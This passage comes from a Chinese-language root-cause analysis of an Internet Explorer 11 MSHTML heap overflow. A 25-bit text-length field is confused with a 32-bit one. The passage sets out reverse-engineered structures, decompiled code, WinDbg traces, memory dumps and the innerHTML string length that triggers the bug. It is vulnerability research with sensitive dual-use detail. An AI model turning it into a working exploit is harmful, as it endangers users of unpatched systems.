        return (cElemLeftAndFlags >> 6) & 1;        // TPF_EDGE = 0x40
    // 当前结点不是标签结点
    if ( (cElemLeftAndFlags & 4) != 0 )           // Text=0x4,IsText()?Cch():0
        // 当前结点是文本数据
        return this->dptp.t._sid_cch & 0x1FFFFFF;   // 低25位为_cch,this->dptp->t->_cch,Cch()
    return 0;
}

CTreeDataPos

CTreeDataPos继承于CTreePos。CTreeDataPos类为CTreePos类的扩展,用于表示文本数据和指针数据。此漏洞所涉及到的关键类,就是该类。

class CTreeDataPos : public CTreePos
{
    ...
    protected:
    union
    {
        DATAPOSTEXT t;
        DATAPOSPOINTER p;
    };
    ...
}

struct DATAPOSTEXT
{
    unsigned long _cch:25;    // [Text] 拥有的字符数,CTreePos::ContentCch()
    unsigned long _sid:7;     // [Text] 此运行的脚本id
    // 这个成员只有在TPF_DATA2_POS标志被打开时才有效,否则,假设lTextID为0。
    long _lTextID;   // [Text] DOM文本节点的文本ID
};

struct DATAPOSPOINTER
{
    // [Pointer] my CMarkupPointer and Gravity
    // Gravity:1,Cling:2,
    DWORD_PTR _dwPointerAndGravityAndCling; 
};

下面是我经过逆向得出的IE11中CTreeDataPos类对象的完整成员。

//CTreeDataPos类对象结构
//Tree::TreeWriter::AllocData1Pos(),0x28,DATAPOSPOINTER
//Tree::TreeWriter::AllocData2Pos(),0x2C,DATAPOSTEXT

+0x000  DWORD _cElemLeftAndFlags,//我的左子树中元素的个数,低9位为Flag,CTreePos::IsNode()
+0x004  DWORD _cchLeft,//我的左子树结构字段中的字符数(维护伸展树(Splay Tree)),CTreePos::GetCpAndMarkup()
+0x008  CTreePos*  _pFirstChild,//我的第一个孩子结点(有可能是左,也有可能是右),CTreePos::LeftChild()
+0x00C  CTreePos*  _pNext,//我的右兄弟或者父亲结点,CTreePos::RightChild(),CTreePos::Parent()
+0x010  CTreePos* _pLeft,//在DOM流中,我左边的CTreePos,CTreePos::PreviousNonPtrTreePos()
+0x014  CTreePos* _pRight,//在DOM流中,我右边的CTreePos,CTreePos::NextNonPtrTreePos()
+0x018  ULONG _ulRefs_Flags,//引用计数,为0就会被释放(dword),低6位为Flags,CTreePos::AddRef(),CTreePos::IsCData(),CTreePos::IsTextCData(),Tree::TreeWriter::AllocData1Pos()
+0x01C  System::SmartObject *pSmartObject,//CTreePos::Release(),CTreeDataPos::SetTextBlock()
+0x020  Tree::TextData *_pTextData,//CTreeDataPos::GetTextLength(),CTreeDataPos::SetTextData(),CTreePos::ContentPch()
+0x024  DATAPOSTEXT t,//CTreePos::ContentCch(),CTreePos::IsCData(),CTreePos::IsTextCData(),CTreePos::IsTextInLayout(),CTreePos::IsMarkedForDeletion(),CTreePos::IncreaseCounts(),CTreePos::DecreaseCounts()
+0x024  DATAPOSPOINTER p,//CTreePos::IsPointerInLayout(),CTreePos::MarkupPointer()

Tree::TreeWriter::AllocData1Pos()函数为指针数据类的CTreeDataPos对象分配内存,并初始化。IE8中此函数为CMarkup::AllocData1Pos()。

CTreeDataPos *__stdcall Tree::TreeWriter::AllocData1Pos()
{
    CTreeDataPos *pTreeDataPos; // eax
    ULONG Flags; // ecx

    // private: static class CTreePos * __stdcall Tree::TreeWriter::AllocData1Pos(void)    
    pTreeDataPos = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x28u);
    if ( pTreeDataPos )
    {
        Flags = pTreeDataPos->_ulRefs_Flags & 0x37; // 清除0x8,Flag
        pTreeDataPos->pSmartObject = 0;
        pTreeDataPos->_pTextData = 0;
        pTreeDataPos->_cElemLeftAndFlags |= 0x80u;  // 设置TPF_DATA_POS = 0x80
        pTreeDataPos->_ulRefs_Flags = Flags | 0x40; // 增加引用计数,低6位为Flags
        pTreeDataPos->_pNext = 0;
    }
    return pTreeDataPos;
}

Tree::TreeWriter::AllocData2Pos()函数为文本数据类的CTreeDataPos对象分配内存,并初始化。IE8中此函数为CMarkup::AllocData2Pos()。

CTreeDataPos *__stdcall Tree::TreeWriter::AllocData2Pos()
{
    CTreeDataPos *pTreeDataPos; // eax
    ULONG Flags; // ecx

    // private: static class CTreePos * __stdcall Tree::TreeWriter::AllocData2Pos(void)    
    pTreeDataPos = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x2Cu);
    if ( pTreeDataPos )
    {
        Flags = pTreeDataPos->_ulRefs_Flags;
        pTreeDataPos->pSmartObject = 0;
        pTreeDataPos->_pTextData = 0;
        pTreeDataPos->_cElemLeftAndFlags |= 0xC0u;  // 设置TPF_DATA_POS = 0x80,TPF_DATA2_POS = 0x40
        pTreeDataPos->_ulRefs_Flags = Flags & 0x37 | 0x40;// 清除0x8,Flag,增加引用计数,低6位为Flags
    }
    return pTreeDataPos;
}

IE11的CTreeDataPos拥有一个新的成员_pTextData,IE8及以前是没有的。以前文本数据是存在CTxtArray类中的,并通过CTxtPtr类对其进行访问。在IE11中并没有废除以前的方式,而是添加了一种新的用于存储文本数据的方式,即Tree::TextData类。

CTreeDataPos::SetTextData()函数用于设置CTreeDataPos对象中_pTextData成员存储的Tree::TextData类对象指针。

void __thiscall CTreeDataPos::SetTextData(CTreeDataPos *this, Tree::TextData *pNewTextData)
{
    Tree::TextData *pOldTextData; // edx

    // public: void __thiscall CTreeDataPos::SetTextData(class Tree::TextData *)   
    // 功能:设置CTreeDataPos中与其相关联的Tree::TextData数据块指针
    ++pNewTextData->_ulRefs;
    pOldTextData = this->_pTextData;
    if ( pOldTextData )
    {
        if ( pOldTextData->_ulRefs-- == 1 )
            MemoryProtection::HeapFree(g_hProcessHeap, pOldTextData);
    }
    this->_pTextData = pNewTextData;
}

CTreeDataPos::GetTextLength()函数可以从两种存储文本字符串的结构CTxtArray和Tree::TextData中获取到文本字符串的长度。此漏洞的根本原因就在于CTreeDataPos类中DATAPOSTEXT结构体的_cch成员(25bit)与Tree::TextData类中_cch成员(32bit)的大小不同,而在使用时进行混用,从而导致了堆块的越界写。具体原因,见后面漏洞的根本原因分析。

LONG __thiscall CTreeDataPos::GetTextLength(CTreeDataPos *this)
{
    Tree::TextData *pTextData; // eax
    LONG TextLength; // eax

    // public: unsigned long __thiscall CTreeDataPos::GetTextLength(void)const     
    pTextData = this->_pTextData;
    if ( pTextData )
        TextLength = pTextData->_cch;
    else
        TextLength = CTreePos::ContentCch(this);
    return TextLength;
}

LONG __thiscall CTreePos::ContentCch(CTreeDataPos *this)
{
  LONG Cch; // eax

  // public: long __thiscall CTreePos::ContentCch(void)const     
  // Pointer=0x8
  if ( (this->_cElemLeftAndFlags & 8) != 0 && CTreePos::HasCollapsedWhitespace(this) )
    Cch = 1;
  else
    // Text = 0x4
    Cch = this->dptp.t._sid_cch & 0x1FFFFFF;    // 关键位置
  return Cch;
}

CTreeDataPos::AppendText()用于在原来的字符串后面附加新的字符串。

HRESULT __thiscall CTreeDataPos::AppendText(CTreeDataPos *this, const wchar_t *AppendTextPtr, ULONG AppendTextCch, BOOL a1)
{
    HRESULT hr; // edi
    wchar_t *TargetTextPtr; // eax
    ULONG TargetTextCch; // [esp+Ch] [ebp-8h] BYREF
    Tree::TextData *pTextData; // [esp+10h] [ebp-4h] MAPDST BYREF

    // public: long __thiscall CTreeDataPos::AppendText(unsigned short const *,unsigned long,bool) 
    hr = 0;
    // 获取源文本数据块数据
    TargetTextPtr = Tree::TextData::GetText(this->_pTextData, 0, &TargetTextCch);
    pTextData = 0;
    // 创建新的文本数据块
    Tree::TextData::Create(TargetTextPtr, TargetTextCch, AppendTextPtr, AppendTextCch, &pTextData);
    if ( pTextData )
        // 重新设置CTreeDataPos中与其相关联的Tree::TextData数据块指针
        CTreeDataPos::SetTextData(this, pTextData);
    else
        hr = 0x8007000E;                            // E_OUTOFMEMORY = 0x8007000E
    if ( pTextData )
    {
        if ( pTextData->_ulRefs-- == 1 )
            MemoryProtection::HeapFree(g_hProcessHeap, pTextData);
    }
    return hr;
}
Tree::TextData

下面是我经过逆向得出的IE11中Tree::TextData类对象的完整成员。

//Tree::TextData对象结构(大小为_cch*2+8,Tree::TextData::AllocateMemory())

+0x000  ULONG _ulRefs,//引用计数,CTreeDataPos::SetTextData()
+0x004  LONG _cch,//文本数据的字符数,Tree::TextData::AllocateMemory()
+0x008  wchar_t _TextData[_cch],//Tree::TextData::AllocateMemory()

Tree::TextData::AllocateMemory()函数用于为Tree::TextData对象分配内存。

void __fastcall Tree::TextData::AllocateMemory(LONG cch, Tree::TextData **ppTextData)
{
    Tree::TextData *pNewTextData; // eax
    Tree::TextData *pOldTextData; // edx

    // private: static void __stdcall Tree::TextData::AllocateMemory(long,class SP<class Tree::TextData> &)    
    // 功能:为文本数据块分配内存
    pNewTextData = MemoryProtection::HeapAlloc<0>(g_hProcessHeap, 2 * cch + 8);
    if ( pNewTextData )
    {
        pNewTextData->_cch = cch;
        pNewTextData->_ulRefs = 1;
    }
    pOldTextData = *ppTextData;
    *ppTextData = pNewTextData;
    if ( pOldTextData )
    {
        if ( pOldTextData->_ulRefs-- == 1 )
            MemoryProtection::HeapFree(g_hProcessHeap, pOldTextData);
    }
}

Tree::TextData::Create()函数用于根据传入的参数字符串创建一个Tree::TextData对象,并将字符串复制到Tree::TextData对象的空间,然后返回Tree::TextData对象的指针。

void __fastcall Tree::TextData::Create(const wchar_t *SourceTextPtr, ULONG SourceTextCch, Tree::TextData **ppTextData)
{
    // public: static void __stdcall Tree::TextData::Create(unsigned short const *,unsigned long,class SP<class Tree::TextData> &) 
    // 功能:为源文本数据块创建一个副本
    Tree::TextData::AllocateMemory(SourceTextCch, ppTextData);
    if ( *ppTextData )
        _memcpy_s((*ppTextData)->_TextData, 2 * SourceTextCch, SourceTextPtr, 2 * SourceTextCch);
}

下面函数是上面函数的重载。能够添加额外的字符串。

void __fastcall Tree::TextData::Create(const wchar_t *SourceTextPtr, ULONG SourceTextCch, const wchar_t *AdditionalTextPtr, ULONG AdditionalTextCch, Tree::TextData **ppTextData)
{
    // public: static void __stdcall Tree::TextData::Create(unsigned short const *,unsigned long,unsigned short const *,unsigned long,class SP<class Tree::TextData> &)    
    // 功能:创建一个文本数据块,可添加新的文本数据
    Tree::TextData::AllocateMemory(SourceTextCch + AdditionalTextCch, ppTextData);
    if ( *ppTextData )
    {
        // 将源文本数据块中的数据复制到新的文本数据块中
        _memcpy_s((*ppTextData)->_TextData, 2 * SourceTextCch, SourceTextPtr, 2 * SourceTextCch);
        if ( AdditionalTextPtr )
            // 创建新文本数据块时,需要添加额外的文本数据,则将其复制到新文本数据块中源文本数据的后面
            _memcpy_s(
            &(*ppTextData)->_TextData[SourceTextCch],
            2 * AdditionalTextCch,
            AdditionalTextPtr,
            2 * AdditionalTextCch);
    }
}

Tree::TextData::GetText()函数用于从Tree::TextData对象获取到文本字符串的指针和长度。

wchar_t *__thiscall Tree::TextData::GetText(Tree::TextData *this, ULONG skip_cch, ULONG *GetedCch)
{
    // public: unsigned short * __thiscall Tree::TextData::GetText(unsigned long,unsigned long *)const     
    // 功能:获取指定字符数量之后的文本字符串的指针
    if ( GetedCch )
        *GetedCch = this->_cch - skip_cch;
    return &this->_TextData[skip_cch];
}
CTxtPtr

CTxtPtr继承于CRunPtr<CTxtBlk>。提供对后备存储区中字符数组的访问(即CTxtArray)。

//CTxtPtr类对象结构(0x14,CSpliceTreeEngine::RecordSplice()->CTxtPtr::BindToCp())

+0x000  CTxtArray* _prgRun,  // CTxtArray指针
+0x004  LONG _iRun,          // 指示CTxtArray中某一元素的索引
+0x008  LONG _ich,           // 指示CTxtArray中某一元素的内容中的字符索引
+0x00C  DWORD _cp,           // 字符在文本流中的位置
+0x010  CMarkup *_pMarkup,   // 指向整个文本编辑类的指针

CSpliceTreeEngine::RecordSplice()函数是CSpliceTreeEngine引擎用于记录DOM树的拼接的函数。

HRESULT __thiscall CSpliceTreeEngine::RecordSplice(CSpliceTreeEngine *this)
{
    _this = this;
    hr1 = 0;
    pMarkupSource = this->_pMarkupSource;
    __this = this;
    if ( *(pMarkupSource + 135) < 90000 || (byte_646F1B3E & 0x10) != 0 )
    {
        v65 = 1;
        pTxtPtr = MemoryProtection::HeapAlloc<1>(g_hProcessHeap, 0x14u);
        if ( pTxtPtr )
        {
            tpSourceLCp = CTreePos::GetCpAndMarkup(_this->_ptpSourceL, 0, 0);
            _pMarkupSource = _this->_pMarkupSource;
            pTxtPtr->_pMarkup = _pMarkupSource;
            pTxtPtr->_iRun = 0;
            pTxtPtr->_ich = 0;
            pTxtPtr->_cp = 0;
            pTxtPtr->_prgRun = (_pMarkupSource + 112);
            pTxtPtr->_cp = CTxtPtr::BindToCp(pTxtPtr, tpSourceLCp);
        }
        else
        {
            pTxtPtr = 0;
        }
        pMarkupSource = _this->_pMarkupSource;
    }
    ...
}

漏洞PoC所对应的DOM树

这里调试时用的PoC是Google Project Zero的Ivan Fratric提供的PoC,未经修改。

重新调试,附加IE进程,在初始断点断下后,设置以下两个断点。

;bp MSHTML!CSpliceTreeEngine::RemoveSplice,CSpliceTreeEngine::RemoveSplice()函数起始地址
    .text:63A46320 ; HRESULT __thiscall CSpliceTreeEngine::RemoveSplice(CSpliceTreeEngine *this)
    .text:63A46320 ?RemoveSplice@CSpliceTreeEngine@@QAEJXZ proc near
    .text:63A46320 mov     edi, edi
    .text:63A46322 push    ebp
    .text:63A46323 mov     ebp, esp
    .text:63A46325 and     esp, 0FFFFFFF8h
    .text:63A46328 sub     esp, 240h
    .text:63A4632E mov     eax, ___security_cookie
    .text:63A46333 xor     eax, esp
    .text:63A46335 mov     [esp+240h+var_4], eax
;bp 63A46783,Crash附近第一次调用CTreePos::GetCp()
    .text:63A46783 mov     ecx, [esi+14h]                  ; this
    .text:63A46786 call    ?GetCp@CTreePos@@QAEJXZ         ; CTreePos::GetCp(void)
    .text:63A4678B mov     ecx, [esi+18h]                  ; this
    .text:63A4678E mov     edi, 1
    .text:63A46793 sub     edi, eax
    .text:63A46795 call    ?GetCp@CTreePos@@QAEJXZ         ; CTreePos::GetCp(void)
    .text:63A4679A mov     ecx, [esi+18h]                  ; this
    .text:63A4679D lea     edx, [edi+eax]

以下内容是WinDbg调试输出的结果:

(1940.12fc): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc              int     3                                             ;初始断点
0:020> bp MSHTML!CSpliceTreeEngine::RemoveSplice
0:020> bp 63A46783
0:020> g
ModLoad: 00000000`73e10000 00000000`73e9e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.864_none_58922fed78a9e6a7\COMCTL32.dll
ModLoad: 00000000`6f840000 00000000`6fa30000   C:\Windows\SysWOW64\uiautomationcore.dll
ModLoad: 00000000`70020000 00000000`70066000   C:\Windows\SysWOW64\Bcp47Langs.dll
ModLoad: 00000000`72e10000 00000000`72e2f000   C:\Windows\SysWOW64\WLDP.DLL
ModLoad: 00000000`771f0000 00000000`77235000   C:\Windows\SysWOW64\WINTRUST.dll
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff            mov     edi,edi                                                ;第一次中断,b.innerHTML = Array(40370176).toString();
0:007:x86> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff            mov     edi,edi                                                ;第二次中断,b.innerHTML = "";
0:007:x86> g
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14          mov     ecx,dword ptr [esi+14h] ds:002b:04f3ca1c=048a05ac
0:007:x86> r
eax=00000000 ebx=04f3cb38 ecx=04890a80 edx=00000000 esi=04f3ca08 edi=048a05ac
eip=63a46783 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14          mov     ecx,dword ptr [esi+14h] ds:002b:04f3ca1c=048a05ac      ;ecx = 0x048a05ac,CTreePos *_ptpSourceL,<head>
0:007:x86> pr
eax=00000000 ebx=04f3cb38 ecx=048a05ac edx=00000000 esi=04f3ca08 edi=048a05ac
eip=63a46786 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x466:
63a46786 e8dc118900      call    MSHTML!CTreePos::GetCp (642d7967)                      ;eax = 0x00000002,<head>在DOM流中的位置
0:007:x86> pr
eax=00000002 ebx=04f3cb38 ecx=00000000 edx=0483d534 esi=04f3ca08 edi=048a05ac
eip=63a4678b esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46b:
63a4678b 8b4e18          mov     ecx,dword ptr [esi+18h] ds:002b:04f3ca20=048a0624      ;ecx = 0x048a0624,CTreePos *_ptpSourceR,</body>
0:007:x86> pr
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=048a05ac
eip=63a4678e esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46e:
63a4678e bf01000000      mov     edi,1
0:007:x86> pr
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=00000001
eip=63a46793 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x473:
63a46793 2bf8            sub     edi,eax
0:007:x86> pr
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=ffffffff
eip=63a46795 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000297
MSHTML!CSpliceTreeEngine::RemoveSplice+0x475:
63a46795 e8cd118900      call    MSHTML!CTreePos::GetCp (642d7967)                      ;eax = 0x00680004,</body>在DOM流中的位置
0:007:x86> pr
eax=00680004 ebx=04f3cb38 ecx=00000000 edx=048a0624 esi=04f3ca08 edi=ffffffff
eip=63a4679a esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47a:
63a4679a 8b4e18          mov     ecx,dword ptr [esi+18h] ds:002b:04f3ca20=048a0624      ;
0:007:x86> pr
eax=00680004 ebx=04f3cb38 ecx=048a0624 edx=048a0624 esi=04f3ca08 edi=ffffffff
eip=63a4679d esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47d:
63a4679d 8d1407          lea     edx,[edi+eax]                                          ;edx = edi+eax = 0x1-0x2+0x00680004 = 0x00680003
0:007:x86> pr
eax=00680004 ebx=04f3cb38 ecx=048a0624 edx=00680003 esi=04f3ca08 edi=ffffffff
eip=63a467a0 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x480:
63a467a0 f60104          test    byte ptr [ecx],4           ds:002b:048a0624=72

我们通过漏洞Crash附近两次调用CTreePos::GetCp()时,传入的参数_ptpSourceL和_ptpSourceR,再结合CTreePos中的_pLeft和_pRight,形成的DOM流双链表结构,以及CTreeNode中_tpBegin和_tpEnd相对于CTreeNode对象起始地址的偏移关系,可以获取到DOM流中所有的元素内容。

以下是ROOT标签的CTreeNode、起始标签和结束标签对应的CTreePos的对象内存数据:

CTreeNode
dd 048a0240
048a0240  04890a80 00000000 7002005f 00000051
048a0250  00000000 00000000 048a05ac 00000000
048a0260  048a02ac 00000062 00000000 00000000
048a0270  048a02c4 048a02c4 00000000 00010004
0x5f = 95,ETAG_ROOT = 95

<ROOT>
CTreePos * = 048a024c
dd 048a024c
048a024c  00000051 00000000 00000000 048a05ac
048a025c  00000000 048a02ac
_cElemLeftAndFlags = 00000051
     ElemLeft = 0x0
     Flags = 0x51 = 0101 0001,NodeBeg=0x1,TPF_LEFT_CHILD=0x10,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a05ac,<head>
_pLeft = 00000000
_pRight = 048a02ac,<html>

</ROOT>
CTreePos * = 048a0264
dd 048a0264
048a0264  00000062 00000000 00000000 048a02c4
048a0274  048a02c4 00000000
_cElemLeftAndFlags = 00000062
     ElemLeft = 0x0
     Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a02c4,</html>
_pLeft = 048a02c4,</html>
_pRight = 00000000

以下是html标签的CTreeNode、起始标签和结束标签对应的CTreePos的对象内存数据:

CTreeNode
dd 048a02a0
048a02a0  04890a40 048a0240 7022003a 00000271
048a02b0  00000001 048a024c 0483d534 048a024c
048a02c0  04896c00 00000262 00680002 04896c60
048a02d0  048a05ac 04896c60 048a0264 00030005
0x3a = 58,ETAG_HTML = 58

<html>
CTreePos * = 048a02ac
dd 048a02ac
048a02ac  00000271 00000001 048a024c 0483d534
048a02bc  048a024c 04896c00
_cElemLeftAndFlags = 00000271
     ElemLeft = 0x2
     Flags = 0x71 = 0111 0001,NodeBeg=0x1,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000001
_pFirstChild = 048a024c,<ROOT>
_pNext = 0483d534,
_pLeft = 048a024c,<ROOT>
_pRight = 04896c00,Pointer

</html>
CTreePos * = 048a02c4
dd 048a02c4
048a02c4  00000262 00680002 04896c60 048a05ac
048a02d4  04896c60 048a0264
_cElemLeftAndFlags = 00000262
     ElemLeft = 0x2
     Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00680002
_pFirstChild = 04896c60,Pointer
_pNext = 048a05ac,<head>
_pLeft = 04896c60,Pointer
_pRight = 048a0264,</ROOT>

以下是head标签的CTreeNode、起始标签和结束标签对应的CTreePos的对象内存数据:

CTreeNode
dd 048a05a0
048a05a0  04890b80 048a02a0 70020036 00000061
048a05b0  00000000 04896c30 048a02ac 04896c30
048a05c0  048a05c4 00000052 00000000 048a060c
048a05d0  048a0624 048a05ac 048a060c ffffffff
0x36 = 54,ETAG_HEAD = 54

<head>
CTreePos *_ptpSourceL = 048a05ac
dd 048a05ac
048a05ac  00000061 00000000 04896c30 048a02ac
048a05bc  04896c30 048a05c4
_cElemLeftAndFlags = 00000061
     ElemLeft = 0x0
     Flags = 0x61 = 0110 0001,NodeBeg=0x1,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 04896c30,Pointer
_pNext = 048a02ac,<html>
_pLeft = 04896c30,Pointer
_pRight = 048a05c4,</head>

</head>
CTreePos * = 048a05c4
dd 048a05c4
048a05c4  00000052 00000000 048a060c 048a0624
048a05d4  048a05ac 048a060c
_cElemLeftAndFlags = 00000052
     ElemLeft = 0x0
     Flags = 0x52 = 0101 0010,NodeEnd=0x2,TPF_LEFT_CHILD=0x10,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 048a060c,<body>
_pNext = 048a0624,</body>
_pLeft = 048a05ac,<head>
_pRight = 048a060c,<body>

以下是body标签的CTreeNode、起始标签和结束标签对应的CTreePos的对象内存数据:

CTreeNode
dd 048a0600
048a0600  0489a3c0 048a02a0 70020012 00000061
048a0610  00000000 00000000 048a05c4 048a05c4
048a0620  04896ae0 00000062 00000000 00000000
048a0630  04896ae0 04896ae0 04896bd0 ffffffff
0x12 = 18,ETAG_BODY = 18

<body>
CTreePos * = 048a060c
dd 048a060c
048a060c  00000061 00000000 00000000 048a05c4
048a061c  048a05c4 04896ae0
_cElemLeftAndFlags = 00000061
     ElemLeft = 0x0
     Flags = 0x61 = 0110 0001,NodeBeg=0x1,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a05c4,</head>
_pLeft = 048a05c4,</head>
_pRight = 04896ae0,Text

</body>
CTreePos *_ptpSourceR = 048a0624
dd 048a0624
048a0624  00000062 00000000 00000000 04896ae0
048a0634  04896ae0 04896bd0
_cElemLeftAndFlags = 00000062
     ElemLeft = 0x0
     Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 04896ae0,Text
_pLeft = 04896ae0,Text
_pRight = 04896bd0,Pointer

以下是DOM流中除了标签结点以外,链入的CTreeDataPos(Text)和CTreeDataPos(Pointer)对象的内存数据:

Pointer
CTreeDataPos * = 04896c30
dd 04896c30
04896c30  00000098 00000000 04896c00 048a02c4
04896c40  04896c00 048a05ac 00000080 00000000
04896c50  00000000 00000000 00000000
_cElemLeftAndFlags = 00000098
     ElemLeft = 0x0
     Flags = 0x98 = 1001 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_DATA_POS=0x80
_cchLeft = 00000000
_pFirstChild = 04896c00,Pointer
_pNext = 048a02c4,</html>
_pLeft = 04896c00,Pointer
_pRight = 048a05ac,<head>
_ulRefs_Flags = 00000080
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 00000000

---------------------------------------------------------------------------------------------------------------

Pointer
CTreeDataPos * = 04896c60
dd 04896c60
04896c60  00000298 00680002 04896bd0 048a0264
04896c70  04896bd0 048a02c4 00000080 00000000
04896c80  00000000 00000001 00000000
_cElemLeftAndFlags = 00000298
     ElemLeft = 0x2
     Flags = 0x98 = 1001 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_DATA_POS=0x80
_cchLeft = 00680002
_pFirstChild = 04896bd0,Pointer
_pNext = 048a0264,</ROOT>
_pLeft = 04896bd0,Pointer
_pRight = 048a02c4,</html>
_ulRefs_Flags = 00000080
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 00000001

---------------------------------------------------------------------------------------------------------------

Text
CTreeDataPos * = 04896ae0
dd 04896ae0
04896ae0  000002f4 00000002 048a05c4 04896bd0
04896af0  048a060c 048a0624 00000041 00000000
04896b00  1cf14020 8267ffff 00000000
_cElemLeftAndFlags = 000002f4
     ElemLeft = 0x2
     Flags = 0xf4 = 1111 0100,Text=0x4,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA2_POS=0x40,TPF_DATA_POS=0x80
_cchLeft = 00000002
_pFirstChild = 048a05c4,</head>
_pNext = 04896bd0,Pointer
_pLeft = 048a060c,<body>
_pRight = 048a0624,</body>
_ulRefs_Flags = 00000041
pSmartObject = 00000000
_pTextData = 1cf14020,Tree::TextData
_sid_cch = 8267ffff
     _cch = 0x8267ffff & 0x1ffffff = 0x67ffff
     _sid = 0x8267ffff >> 25 = 0x41 = 0100 0001
_lTextID = 00000000

!heap -x 1cf14020
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
000000001cf14018  000000001cf14020  0000000000730000  0000000000730000   4d01000         0       ffa  busy extra virtual

dd 1cf14020
1cf14020  00000002 0267ffff 002c002c 002c002c
1cf14030  002c002c 002c002c 002c002c 002c002c
1cf14040  002c002c 002c002c 002c002c 002c002c
1cf14050  002c002c 002c002c 002c002c 002c002c
1cf14060  002c002c 002c002c 002c002c 002c002c
1cf14070  002c002c 002c002c 002c002c 002c002c
1cf14080  002c002c 002c002c 002c002c 002c002c
1cf14090  002c002c 002c002c 002c002c 002c002c
...
dd 1cf14020+0x2680000*2-0x10
21c14010  002c002c 002c002c 002c002c 002c002c
21c14020  002c002c 0000002c 00000000 00000000
_ulRefs = 0x2
_cch = 0x0267ffff = 40370175
_TextData = 2c 00 2c 00 ...

0x21c14026 - 0x1cf14028 = 0x4CFFFFE
0x4CFFFFE/2 = 0x267FFFF = 40370175

---------------------------------------------------------------------------------------------------------------

Pointer
CTreeDataPos * = 04896c00
dd 04896c00
04896c00  000000b8 00000000 00000000 04896c30
04896c10  048a02ac 04896c30 00000040 00000000
04896c20  00000000 04f3ce28 00000000
_cElemLeftAndFlags = 000000b8
     ElemLeft = 0x0
     Flags = 0xb8 = 1011 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA_POS=0x80
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 04896c30,Pointer
_pLeft = 048a02ac,<html>
_pRight = 04896c30,Pointer
_ulRefs_Flags = 00000040
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 04f3ce28

---------------------------------------------------------------------------------------------------------------

Pointer
CTreeDataPos * = 04896bd0
dd 04896bd0
04896bd0  000002b8 00680002 04896ae0 04896c60
04896be0  048a0624 04896c60 00000040 00000000
04896bf0  00000000 04f3ce70 00000000
_cElemLeftAndFlags = 000002b8
     ElemLeft = 0x2
